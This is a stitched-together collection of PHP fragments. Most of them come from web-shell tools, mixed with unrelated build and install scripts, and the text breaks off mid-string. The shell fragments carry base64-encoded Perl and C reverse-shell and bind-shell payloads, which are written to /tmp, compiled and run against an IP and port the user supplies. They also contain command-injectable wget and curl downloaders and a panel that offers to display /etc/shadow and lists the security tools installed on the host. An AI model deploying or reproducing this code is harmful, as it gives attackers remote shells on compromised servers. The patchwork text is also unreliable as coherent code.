function backconnect($ip, $port, $method) { $perl = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj\r\naG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR\r\nhcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT\r\nsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI\r\nkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi\r\nKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl\r\nOKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; $c = "I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC\r\nBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb\r\nSAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd\r\nKSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ\r\nsZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC\r\nAoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D\r\nQogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp\r\nOw0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ=="; if ($method == 'Perl') { fputs($i = fopen('/tmp/shlbck', 'w'), base64_decode($perl)); fclose($i); ex(which("perl") . " /tmp/shlbck " . $ip . " " . $port . " &"); unlink("/tmp/shlbck"); return ex('netstat -an | grep -i listen'); } elseif ($method == 'C#') { fputs($i = fopen('/tmp/shlbck.c', 'w'), base64_decode($c)); fclose($i); ex("gcc shlbck.c -o shlbck"); unlink('shlbck.c'); ex("/tmp/shlbck " . $ip . " " . $port . " &"); unlink("/tmp/shlbck"); return ex('netstat -an | grep -i listen'); } else { return 'Choose method'; } }
while (false !== ($file = @readdir($dh))) { $f = $dir . '/' . $file; if (is_dir($f)) { if ($file[0] != ".") { if (fnmatch($pattern, $file)) { $dirs[] = $f; } search($f); } } elseif (fnmatch($pattern, $file)) { $files[] = $f; } } @closedir($dh); } } if (empty($content)) { search($dir); } else { if (empty($case)) { $case = "-i"; } else { $case = ""; } exec(which("grep") . " -R {$case} -l " . escapeshellarg($content) . " " . escapeshellarg($dir) . "/" . $pattern, $files); } if (empty($dirs) && empty($files)) { echo "<i>{$strNotFound}</i>"; } include "../../fm/showdir.php"; exit;
function download($cmd, $url) { $namafile = basename($url); switch ($cmd) { case 'wwget': exe(which('wget') . " " . $url . " -O " . $namafile); break; case 'wlynx': exe(which('lynx') . " -source " . $url . " > " . $namafile); break; case 'wfread': ambil($wurl, $namafile); break; case 'wfetch': exe(which('fetch') . " -o " . $namafile . " -p " . $url); break; case 'wlinks': exe(which('links') . " -source " . $url . " > " . $namafile); break; case 'wget': exe(which('GET') . " " . $url . " > " . $namafile); break; case 'wcurl': exe(which('curl') . " " . $url . " -o " . $namafile); break; default: break; } return $namafile; }
function actionNetwork() { hardHeader(); $back_connect_c = "I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pIHsNCiAgICBpbnQgZmQ7DQogICAgc3RydWN0IHNvY2thZGRyX2luIHNpbjsNCiAgICBkYWVtb24oMSwwKTsNCiAgICBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogICAgc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsNCiAgICBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsNCiAgICBpZiAoKGNvbm5lY3QoZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikgJnNpbiwgc2l6ZW9mKHN0cnVjdCBzb2NrYWRkcikpKTwwKSB7DQogICAgICAgIHBlcnJvcigiQ29ubmVjdCBmYWlsIik7DQogICAgICAgIHJldHVybiAwOw0KICAgIH0NCiAgICBkdXAyKGZkLCAwKTsNCiAgICBkdXAyKGZkLCAxKTsNCiAgICBkdXAyKGZkLCAyKTsNCiAgICBzeXN0ZW0oIi9iaW4vc2ggLWkiKTsNCiAgICBjbG9zZShmZCk7DQp9"; $back_connect_p = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7"; $bind_port_c = "I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxzdGRsaWIuaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICoqYXJndikgew0KICAgIGludCBzLGMsaTsNCiAgICBjaGFyIHBbMzBdOw0KICAgIHN0cnVjdCBzb2NrYWRkcl9pbiByOw0KICAgIGRhZW1vbigxLDApOw0KICAgIHMgPSBzb2NrZXQoQUZfSU5FVCxTT0NLX1NUUkVBTSwwKTsNCiAgICBpZighcykgcmV0dXJuIC0xOw0KICAgIHIuc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgci5zaW5fcG9ydCA9IGh0b25zKGF0b2koYXJndlsxXSkpOw0KICAgIHIuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7DQogICAgYmluZChzLCAoc3RydWN0IHNvY2thZGRyICopJnIsIDB4MTApOw0KICAgIGxpc3RlbihzLCA1KTsNCiAgICB3aGlsZSgxKSB7DQogICAgICAgIGM9YWNjZXB0KHMsMCwwKTsNCiAgICAgICAgZHVwMihjLDApOw0KICAgICAgICBkdXAyKGMsMSk7DQogICAgICAgIGR1cDIoYywyKTsNCiAgICAgICAgd3JpdGUoYywiUGFzc3dvcmQ6Iiw5KTsNCiAgICAgICAgcmVhZChjLHAsc2l6ZW9mKHApKTsNCiAgICAgICAgZm9yKGk9MDtpPHN0cmxlbihwKTtpKyspDQogICAgICAgICAgICBpZiggKHBbaV0gPT0gJ1xuJykgfHwgKHBbaV0gPT0gJ1xyJykgKQ0KICAgICAgICAgICAgICAgIHBbaV0gPSAnXDAnOw0KICAgICAgICBpZiAoc3RyY21wKGFyZ3ZbMl0scCkgPT0gMCkNCiAgICAgICAgICAgIHN5c3RlbSgiL2Jpbi9zaCAtaSIpOw0KICAgICAgICBjbG9zZShjKTsNCiAgICB9DQp9"; $bind_port_p = "IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0="; echo "<h1>Network tools</h1><div class=content>\n\t<form name='nfp' onSubmit='g(null,null,this.using.value,this.port.value,this.pass.value);return false;'>\n\t<span>Bind port to /bin/sh</span><br/>\n\tPort: <input type='text' name='port' value='31337'> Password: <input type='text' name='pass'> Using: <label><select name='using'><option value='bpc'>C</option><option value='bpp'>Perl</option></select></label> <input type=submit value='submit'>\n\t</form>\n\t<form name='nfp' onSubmit='g(null,null,this.using.value,this.server.value,this.port.value);return false;'>\n\t<span>Back-connect to</span><br/>\n\tServer: <input type='text' name='server' value=" . $_SERVER['REMOTE_ADDR'] . "> Port: <input type='text' name='port' value='31337'> Using: <label><select name='using'><option value='bcc'>C</option><option value='bcp'>Perl</option></select></label> <input type=submit value='submit'>\n\t</form><br>"; if (isset($_POST['p1'])) { function cf($f, $t) { $w = @fopen($f, "w") or @function_exists('file_put_contents'); if ($w) { @fwrite($w, @base64_decode($t)) or @fputs($w, @base64_decode($t)) or @file_put_contents($f, @base64_decode($t)); @fclose($w); } } if ($_POST['p1'] == 'bpc') { cf("/tmp/bp.c", $bind_port_c); $▖ = ex("gcc -o /tmp/bp /tmp/bp.c"); @unlink("/tmp/bp.c"); $▖ .= ex("/tmp/bp " . $_POST['p2'] . " " . $_POST['p3'] . " &"); echo "<pre class=ml1>{$▖}" . ex("ps aux | grep bp") . "</pre>"; } if ($_POST['p1'] == 'bpp') { cf("/tmp/bp.pl", $bind_port_p); $▖ = ex(which("perl") . " /tmp/bp.pl " . $_POST['p2'] . " &"); echo "<pre class=ml1>{$▖}" . ex("ps aux | grep bp.pl") . "</pre>"; } if ($_POST['p1'] == 'bcc') { cf("/tmp/bc.c", $back_connect_c); $▖ = ex("gcc -o /tmp/bc /tmp/bc.c"); @unlink("/tmp/bc.c"); $▖ .= ex("/tmp/bc " . $_POST['p2'] . " " . $_POST['p3'] . " &"); echo "<pre class=ml1>{$▖}" . ex("ps aux | grep bc") . "</pre>"; } if ($_POST['p1'] == 'bcp') { cf("/tmp/bc.pl", $back_connect_p); $▖ = ex(which("perl") . " /tmp/bc.pl " . $_POST['p2'] . " " . $_POST['p3'] . " &"); echo "<pre class=ml1>{$▖}" . ex("ps aux | grep bc.pl") . "</pre>"; } } echo '</div>'; hardFooter(); }
$_POST['cmd'] = which('wget') . " " . $_POST['rem_file'] . " -O " . $_POST['loc_file'] . ""; break; case fetch: $_POST['cmd'] = which('fetch') . " -o " . $_POST['loc_file'] . " -p " . $_POST['rem_file'] . ""; break; case lynx: $_POST['cmd'] = which('lynx') . " -source " . $_POST['rem_file'] . " > " . $_POST['loc_file'] . ""; break; case links: $_POST['cmd'] = which('links') . " -source " . $_POST['rem_file'] . " > " . $_POST['loc_file'] . ""; break; case GET: $_POST['cmd'] = which('GET') . " " . $_POST['rem_file'] . " > " . $_POST['loc_file'] . ""; break; case curl: $_POST['cmd'] = which('curl') . " " . $_POST['rem_file'] . " -o " . $_POST['loc_file'] . ""; break; } } if (!empty($_POST['cmd']) && ($_POST['cmd'] == "ftp_file_up" || $_POST['cmd'] == "ftp_file_down")) { list($ftp_server, $ftp_port) = split(":", $_POST['ftp_server_port']); if (empty($ftp_port)) { $ftp_port = 21; } $connection = @ftp_connect($ftp_server, $ftp_port, 10); if (!$connection) { fe($language, 0); } else { if (!@ftp_login($connection, $_POST['ftp_login'], $_POST['ftp_password'])) { fe($language, 1); } else {
fr($query); } } } tbfoot(); mysql_close($lnk); } elseif ($haz == 'bconx') { !$yourip && ($yourip = $_SERVER['REMOTE_ADDR']); !$yourport && ($yourport = '12345'); $usedb = array('perl' => 'perl', 'c' => 'c'); $rv_connect = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj" . "aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR" . "hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT" . "sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI" . "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi" . "KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl" . "OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; $rv_connect_c = "I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC" . "BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb" . "SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd" . "KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ" . "sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC" . "Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D" . "QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp" . "Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ=="; if ($start && $yourip && $yourport && $use) { if ($use == 'perl') { sv_file('/tmp/god_bc', @base64_decode($rv_connect)); $res = mycmd(which('perl') . " /tmp/god_bc {$yourip} {$yourport} &"); } else { sv_file('/tmp/god_bc.c', @base64_decode($rv_connect_c)); $res = mycmd('gcc -o /tmp/god_bc /tmp/god_bc.c'); @unlink('/tmp/god_bc.c'); $res = mycmd("/tmp/god_bc {$yourip} {$yourport} &"); } m("Now script try connect to {$yourip} port {$yourport} ..."); } formhead(array('title' => 'Back Connect')); makehide('haz', 'bconx'); p('<p>'); p('Your IP:'); makeinput(array('name' => 'yourip', 'size' => 20, 'value' => $yourip)); p('Your Port:'); makeinput(array('name' => 'yourport', 'size' => 15, 'value' => $yourport));
session_start(); if (!$_SESSION['fm_entry']) { die('Not a Valid Entry'); } include_once "../lang/" . $_SESSION['lang'] . ".lang.php"; include_once "../lib/func.php"; include_once "../lib/sysfunc.php"; extract(stripslashes_r($_POST)); if (empty($files)) { exit; } if (!is_array($files)) { $files = array($files); } setenvlang(); $com = which("rm"); if ($com) { foreach ($files as $f) { if (is_dir($f)) { exec($com . " -r -f " . escapeshellarg($f) . " 2>&1", $out); if (!empty($out)) { echo "{$strRmDirFailed} " . hc($f) . "<br>" . hs($out[0]) . "..."; exit; } } else { exec($com . " -f " . escapeshellarg($f) . " 2>&1", $out); if (!empty($out)) { echo "{$strDeleteFileError} " . hc($f) . "<br>" . hs($out[0]) . "..."; exit; } }
} list($bin, $ok) = which('./cloc.pl'); if ($ok) { $clocBin = $bin; } $ctagsBin = false; list($bin, $ok) = which('ctags'); if ($ok) { $ctagsVersion = []; exec($bin . ' --version', $ctagsVersion); if (false !== strpos(implode('', $ctagsVersion), 'Exuberant')) { $ctagsBin = $bin; } } $phpunitBin = false; list($bin, $ok) = which('vendor/bin/phpunit'); if ($ok) { $phpunitBin = $bin; } $fmtBin = false; if (file_exists('fmt.php')) { $fmtBin = 'fmt.php'; } elseif (file_exists('vendor/bin/fmt.php')) { $fmtBin = 'vendor/bin/fmt.php'; } $phpdocBin = false; if (file_exists('vendor/bin/phpdoc.php')) { $phpdocBin = 'vendor/bin/phpdoc.php'; } $execute = function () { global $clocBin, $ctagsBin, $phpunitBin, $fmtBin, $phpdocBin, $argv;
shell(which('wget') . " " . $_POST['urldown'] . " -O " . $_POST['filename'] . ""); break; case fetch: shell(which('fetch') . " -o " . $_POST['filename'] . " -p " . $_POST['urldown'] . ""); break; case lynx: shell(which('lynx') . " -source " . $_POST['urldown'] . " > " . $_POST['filename'] . ""); break; case links: shell(which('links') . " -source " . $_POST['urldown'] . " > " . $_POST['filename'] . ""); break; case GET: shell(which('GET') . " " . $_POST['urldown'] . " > " . $_POST['filename'] . ""); break; case curl: shell(which('curl') . " " . $_POST['urldown'] . " -o " . $_POST['filename'] . ""); break; } } } } //Brute if ($action == 'brute') { function Brute() { global $action, $pass_de, $chars_de, $dat, $date; ignore_user_abort(1); } if ($chars_de == "") { $chars_de = ""; }
function actionSecInfo() { echo '<h1>Server security information</h1><div class=content>'; function showSecParam($n, $v) { $v = trim($v); if ($v) { echo '<span>' . $n . ': </span>'; if (strpos($v, "\n") === false) { echo $v . '<br>'; } else { echo '<pre class=ml1>' . $v . '</pre>'; } } } showSecParam('Server software', @getenv('SERVER_SOFTWARE')); if (function_exists('apache_get_modules')) { showSecParam('Loaded Apache modules', implode(', ', apache_get_modules())); } showSecParam('Disabled PHP Functions', $GLOBALS['disable_functions'] ? $GLOBALS['disable_functions'] : 'none'); showSecParam('Open base dir', @ini_get('open_basedir')); showSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir')); showSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir')); showSecParam('cURL support', function_exists('curl_version') ? 'enabled' : 'no'); $temp = array(); if (function_exists('mysql_get_client_info')) { $temp[] = "MySql (" . mysql_get_client_info() . ")"; } if (function_exists('mssql_connect')) { $temp[] = "MSSQL"; } if (function_exists('pg_connect')) { $temp[] = "PostgreSQL"; } if (function_exists('oci_connect')) { $temp[] = "Oracle"; } showSecParam('Supported databases', implode(', ', $temp)); echo '<br>'; if ($GLOBALS['os'] == 'nix') { $userful = array('gcc', 'lcc', 'cc', 'ld', 'make', 'php', 'perl', 'python', 'ruby', 'tar', 'gzip', 'bzip', 'bzip2', 'nc', 'locate', 'suidperl'); $danger = array('kav', 'nod32', 'bdcored', 'uvscan', 'sav', 'drwebd', 'clamd', 'rkhunter', 'chkrootkit', 'iptables', 'ipfw', 'tripwire', 'shieldcc', 'portsentry', 'snort', 'ossec', 'lidsadm', 'tcplodg', 'sxid', 'logcheck', 'logwatch', 'sysmask', 'zmbscap', 'sawmill', 'wormscan', 'ninja'); $downloaders = array('wget', 'fetch', 'lynx', 'links', 'curl', 'get', 'lwp-mirror'); showSecParam('Readable /etc/passwd', @is_readable('/etc/passwd') ? "yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"passwd\")'>[view]</a>" : 'no'); showSecParam('Readable /etc/shadow', @is_readable('/etc/shadow') ? "yes <a href='#' onclick='g(\"FilesTools\", \"etc\", \"shadow\")'>[view]</a>" : 'no'); showSecParam('OS version', @file_get_contents('/proc/version')); showSecParam('Distr name', @file_get_contents('/etc/issue.net')); if (!$GLOBALS['safe_mode']) { echo '<br>'; $temp = array(); foreach ($userful as $item) { if (which($item)) { $temp[] = $item; } } showSecParam('Userful', implode(', ', $temp)); $temp = array(); foreach ($danger as $item) { if (which($item)) { $temp[] = $item; } } showSecParam('Danger', implode(', ', $temp)); $temp = array(); foreach ($downloaders as $item) { if (which($item)) { $temp[] = $item; } } showSecParam('Downloaders', implode(', ', $temp)); echo '<br/>'; showSecParam('Hosts', @file_get_contents('/etc/hosts')); showSecParam('HDD space', ex('df -h')); showSecParam('Mount options', @file_get_contents('/etc/fstab')); } } else { showSecParam('OS Version', ex('ver')); showSecParam('Account Settings', ex('net accounts')); showSecParam('User Accounts', ex('net user')); } echo '</div>'; }
<?php $package = 'nginx'; package($package)->install(); if (!in_array(paper('os.distribution'), ['void'])) { var_dump(paper('os.distribution')); service($package)->enable()->requires(package($package)); } $wwwFolder = '/var/local/www/'; $nginxConfig = which(paper('os.distribution'), ["freebsd" => '/usr/local/etc/nginx/nginx.conf', '/etc/nginx/nginx.conf']); $nginxConfigDef = file($nginxConfig)->contents(file_get_contents(__DIR__ . '/nginx/nginx.conf'))->requires(package($package)); if (!in_array(paper('os.distribution'), ['void'])) { $nginxConfigDef->notify(service($package)); } dir($wwwFolder)->recursive(); file($wwwFolder . 'index.html')->contents('success:order')->requires(package($package))->requires(dir($wwwFolder))->requires(file($nginxConfig));
function detect_install_dirs($_prefix = null) { global $temp_dir, $prefix, $bin_dir, $php_dir, $php_bin, $doc_dir, $data_dir, $test_dir; if (WINDOWS) { if ($_prefix === null) { $prefix = getcwd(); } else { $prefix = $_prefix; } if (!@is_dir($prefix)) { if (@is_dir('c:\\php5')) { $prefix = 'c:\\php5'; } elseif (@is_dir('c:\\php4')) { $prefix = 'c:\\php4'; } elseif (@is_dir('c:\\php')) { $prefix = 'c:\\php'; } } $bin_dir = '$prefix'; $php_dir = '$prefix\\pear'; $doc_dir = '$php_dir\\docs'; $data_dir = '$php_dir\\data'; $test_dir = '$php_dir\\tests'; $temp_dir = '$prefix\\temp'; /* * Detects php.exe */ if ($t = getenv('PHP_PEAR_PHP_BIN')) { $php_bin = $t; } elseif ($t = getenv('PHP_BIN')) { $php_bin = $t; } elseif ($t = which('php')) { $php_bin = $t; } elseif (is_file($prefix . '\\cli\\php.exe')) { $php_bin = $prefix . '\\cli\\php.exe'; } elseif (is_file($prefix . '\\php.exe')) { $php_bin = $prefix . '\\php.exe'; } if ($php_bin && !is_file($php_bin)) { $php_bin = ''; } else { if (!ereg(":", $php_bin)) { $php_bin = getcwd() . DIRECTORY_SEPARATOR . $php_bin; } } if (!is_file($php_bin)) { if (is_file('c:/php/cli/php.exe')) { $php_bin = 'c:/php/cli/php.exe'; } elseif (is_file('c:/php5/php.exe')) { $php_bin = 'c:/php5/php.exe'; } elseif (is_file('c:/php4/cli/php.exe')) { $php_bin = 'c:/php4/cli/php.exe'; } } } else { if ($_prefix === null) { #$prefix = dirname(PHP_BINDIR); $prefix = "@PREFIX@"; } else { $prefix = $_prefix; } $bin_dir = '$prefix/bin'; #$php_dir = '$prefix/share/pear'; $php_dir = '$prefix/lib/php'; $doc_dir = '$php_dir/doc'; $data_dir = '$php_dir/data'; $test_dir = '$php_dir/test'; $temp_dir = '@WRKSRC@/tmp'; } }
$res = @system(which('perl') . " /tmp/magiccoder_bind_pl {$yourport_bind} &"); break; case 'passthru': $res = @passthru(which('perl') . " /tmp/magiccoder_bind_pl {$yourport_bind} &"); break; case 'exec': $res = @exec(which('perl') . " /tmp/magiccoder_bind_pl {$yourport_bind} &"); break; case 'execute': $res = @execute(which('perl') . " /tmp/magiccoder_bind_pl {$yourport_bind} &"); break; case 'shell_exec': $res = @shell_exec(which('perl') . " /tmp/magiccoder_bind_pl {$yourport_bind} &"); break; case 'popen': $res = @fread(popen(which('perl') . " /tmp/magiccoder_bind_pl {$yourport_bind} &", r), 9999); break; } } m("bind on port {$yourport_bind} Started..."); echo '<br><center>Use from <b>' . $_POST['execfunction_bind'] . '</b> function<hr width="222px" noshade /></center>'; } formhead(array('title' => 'Bind Port')); makehide('action', 'net'); p('<p>'); p('Your Port:'); makeinput(array('name' => 'yourport_bind', 'size' => 15, 'value' => $yourport_bind)); p('Use:'); makeselect(array('name' => 'use', 'option' => $usedb, 'selected' => $use)); echo "Function: <select class=\"input\" name=\"execfunction_bind\" >\n<option value=\"system\">system</option>\n<option value=\"passthru\">passthru</option>\n<option value=\"exec\">exec</option>\n<option value=\"execute\">execute</option>\n<option value=\"shell_exec\">shell_exec</option>\n<option value=\"popen\">popen</option>\n</select>\n"; makeinput(array('name' => 'start_bind', 'value' => 'Start', 'type' => 'submit', 'class' => 'bt'));
function clear_ar_tmp_dir($dir) { foreach (glob($dir . '/*') as $file) { execute(which("rm") . " -r -f " . escapeshellarg($file)); } }
$back_connect_c = "I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC" . "BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb" . "SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd" . "KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ" . "sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC" . "Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D" . "QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp" . "Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ=="; $back_connect_py = "IyEvdXNyL2Jpbi9weXRob24gDQppbXBvcnQgc3lzIA0KaW1wb3J0IHNvY2tldCANCnNoZWxsPScv" . 